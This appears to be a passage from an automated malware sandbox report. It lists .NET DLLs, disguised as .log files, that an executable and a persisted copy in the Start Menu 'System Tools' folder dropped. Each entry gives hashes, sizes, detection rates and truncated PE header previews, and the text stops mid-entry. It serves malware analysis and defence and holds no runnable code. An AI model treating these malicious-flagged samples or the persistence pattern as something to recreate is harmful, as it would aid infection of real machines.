                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\MKncHkNR.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\MbPZGXOu.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\Mdbejyft.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\MjzskGoA.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\MmOLMqmx.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\MwSuJUdT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NAwlwLuv.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NEWCTUxq.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NEXrZULz.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NGhBOsDn.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NImBSGpT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NQgmULbr.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\NhIjUycT.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\OLsbOcto.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\OOHuqLql.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\OnPkEyEo.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\OsbzKhHx.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\PUeIrTzt.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\PoAthZqt.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\PrtbrpVP.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
